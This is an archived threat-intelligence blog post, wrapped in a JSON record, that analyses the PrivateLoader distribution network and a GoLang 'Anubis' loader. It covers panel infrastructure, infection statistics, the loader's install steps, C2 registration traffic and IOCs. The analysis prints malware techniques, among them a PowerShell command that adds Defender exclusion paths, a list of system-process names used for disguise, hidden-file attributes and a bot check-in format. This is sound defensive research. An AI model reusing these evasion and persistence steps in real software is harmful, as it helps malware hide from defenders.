{
	"id": "f5566dd9-0a33-4a55-97a2-f0f6151bb570",
	"created_at": "2026-04-06T01:32:22.348303Z",
	"updated_at": "2026-04-10T13:11:39.178229Z",
	"deleted_at": null,
	"sha1_hash": "22f00de0afb4524363defeb56d3c3b57b690c80a",
	"title": "PrivateLoader to Anubis Loader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3022909,
	"plain_text": "PrivateLoader to Anubis Loader\r\nBy Jason Reaves\r\nPublished: 2022-02-14 · Archived: 2026-04-06 00:35:07 UTC\r\nFeb 14, 2022\r\nBy: Jason Reaves and Joshua Platt\r\nIntel471 released a report[1] on a loader system being leveraged for distribution of various crimeware malware families:\r\nQbot\r\nSmokeLoader\r\nTrickBot\r\nNanoCore RAT\r\nRedline stealer\r\nnjRat\r\nhttps://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e\r\nPage 1 of 17\n\nDjvu ransomware\r\nVidar stealer\r\nRemcos RAT\r\nTofsee spambot\r\nQRat\r\nLockbit ransomware\r\nDridex\r\nDanaBot\r\nThe diversity of the malware families led the Walmart Cyber Intel team to investigate further.\r\nInfrastructure Analysis\r\nThe report mentioned an administrator panel located on the main command and control server. The panel is named “EZCubePanel” by the author. The configuration options are fairly straightforward as laid out in the Intel471 offering. The panel is configured to deliver links and browser extensions.\r\nLinks\r\nThe browser extensions did appear to be suspended at the time but were likely utilized in previous campaigns.\r\nExtensions\r\nWhile the AdminLTE open source bootstrap template has been implemented to streamline the UI process, the main functionality is implemented in PHP.\r\nCuriously, two geo tags appear to be linked to specific domains. 
The tag WW_5 is hard coded for ezsoftware[.]ru, while the tag WW_8 is linked to vip-space[.]com \u0026 vip-files[.]com\r\nDomains\r\nInstaller\r\nThe PrivateLoader installer makes some interesting requests.\r\n941c7e39e8ea114465eadbd45aa709d55ad36ba551cbbf552e4c09b494a3a32d\r\nAfter downloading a proxy list and contacting statistics.php, the payload link is encrypted with a simple XOR routine and delivered to the client.\r\n\u003e\u003e\u003e for i in range(len(b)):\r\n...     b[i] ^= 0x1d\r\n...\r\n\u003e\u003e\u003e b\r\nbytearray(b'URL:https://cdn.discordapp. com/atta\r\nDatabase\r\nInfection counts show a large loader based system, which mimics some of the data presented in the report by Intel471.\r\nExtension infection stats:\r\nLogger infection stats from deliveries:\r\nLoaders Loading Loaders\r\nAccording to the report, “Privacy tools” domains were utilized as a primary delivery for SmokeLoader. After checking out a few of the domains, some interesting stats were discovered. In November of 2021, over a period of 20 days there were over 125K loads. For December 2021, roughly 82K for pab2 and pab3.\r\nStats\r\nThe stat panel below appeared to show loads for the affiliate IDs pub1, pub2 and pub3. Nearly 33K loads in nine days.\r\nCurrent Stats\r\nDuring our investigation we found other loaders delivered by PrivateLoader. 
This is similar to what the report stated. However, during some of the loader executions, we observed traffic that did not appear to line up with the other stealers.\r\nAfter further inspection of the ‘build_dl’ traffic, one of the uncovered loader samples was actually developed in GoLang.\r\nUpon execution, the sample performs a check to see if it has admin privileges by attempting to open \\\\PHYSICALDRIVE:\r\nNext it takes a screenshot:\r\nAnd then proceeds to install itself:\r\nSome of the strings are obfuscated but the deobfuscation is simply subtracting one from every character:\r\ndef deobf(a):\r\n    b = bytearray(a)\r\n    for i in range(len(b)):\r\n        b[i] -= 1\r\n    return b\r\nSo now we can easily map out the install process steps. The malware leverages PowerShell to set up some exclusion paths:\r\npowershell -Command Add-MpPreference -ExclusionPath\r\non:\r\n AppData\\Local\\Temp\r\n AppData\\Local\\Microsoft\r\nIt sets a run key in Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run; the registry name and install name will be randomly generated from a hardcoded list of possibilities. Install names:\r\nsvchost\r\ncsrss\r\nrundll32\r\nwinlogon\r\nsmss\r\ntaskhost\r\nunsecapp\r\nAdobeARM\r\nwinsys\r\njusched\r\nBCU\r\nwscntfy\r\nconhost\r\ncsrss\r\ndwm\r\nsidebar\r\nADService\r\nAppServices\r\nacrotray\r\nctfmon\r\nlsass\r\nrealsched\r\nspoolsv\r\nRTHDCPL\r\nRTDCPL\r\nMSASCui\r\nFor the registry names:\r\nTrion 
Softworks\r\nMystic Entertainment\r\nMicrosoft Partners\r\nClient-Server Runtime Subsystem\r\nNetworking Service\r\nAfter moving itself to the proper location it will use ‘attrib’ to set itself as a system file and hidden:\r\nattrib +S +H\r\nAlong with altering the HOSTS file (edited for brevity):\r\nAnd flushing the DNS cache:\r\nipconfig //flushdns\r\nAfter installation the bot will connect to the C2 either over HTTP or TCP and register itself by sending various information back to the C2 via TCP:\r\nmd5(cmd /c whoami) +\r\n“-\u003eReg-\u003e[“ +\r\nDatetime +\r\n”]-\u003e” +\r\n\u003ccmd /c whoami\u003e +\r\n“-\u003e” +\r\n\u003cwmic cpu get name\u003e +\r\n“-\u003e” +\r\n\u003cwmic path win32_VideoController get name\u003e +\r\n“-\u003e” +\r\n\u003ccmd /C ver\u003e +\r\n“-\u003e” +\r\nBot Build +\r\n\u003cisAdmin()\u003e\r\nBot registration\r\nFor HTTP traffic an example can be seen below; the data sent to the server is obfuscated by adding two to every byte:\r\nPOST /callback HTTP/1.1\r\nHost: redacted.x.x.x\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 57\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\ncallback=HktgYcnn%22Cffgf%22%2F%22lwuejgf\u0026reginfo=WugtMKV\r\nAfter registration, the bot will check for tasks to perform:\r\nTask parsing\r\nTask Commands\r\nPanel\r\nThe panel refers to itself as ‘ANUBIS PANEL’ and contains roughly 20K bots. 
The bots appeared to be leveraged for crypto mining and distributing other malware.\r\nPPI stats\r\nBy country:\r\nCountry map for installs:\r\nInstall stat slice from January:\r\nThe stats clearly show Anubis operators have been delivering thousands of installs each week. In the case of Anubis, more than 500 unique binaries were distributed. The delivered tasks from Anubis also appear to similarly overlap with those of PrivateLoader.\r\nOver a period of 12 days, more than 11 GB of stealer logs were collected. While cracked software is often overlooked in the world of cybercrime, it is clearly underestimated as a tactic.\r\nIOCs\r\nAnubis Loader:\r\n84b33d3b0c1e396758f9591e797f5b0029be3f6a752dc2bec2dc20a85d68adda\r\nb7e657155c23d71f732171d68764793bb6010d42da1f80eb4dc9a630aeae1307\r\n4b5b660add37cd7a6d6a2444c3d410ed0de1c24e59c5e1d0091976bbc8099fef\r\nTCP traffic suricata rule:\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any ( msg:\"Anubis Registration\"; content:\"|54 67 69 2f 40|\"\r\nReferences\r\n1: https://intel471.com/blog/privateloader-malware\r\n2: https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer\r\nSource: 
https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e"
	],
	"report_names": [
		"privateloader-to-anubis-loader-55d066a2653e"
	],
	"threat_actors": [],
	"ts_created_at": 1775439142,
	"ts_updated_at": 1775826699,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/22f00de0afb4524363defeb56d3c3b57b690c80a.pdf",
		"text": "https://archive.orkl.eu/22f00de0afb4524363defeb56d3c3b57b690c80a.txt",
		"img": "https://archive.orkl.eu/22f00de0afb4524363defeb56d3c3b57b690c80a.jpg"
	}
}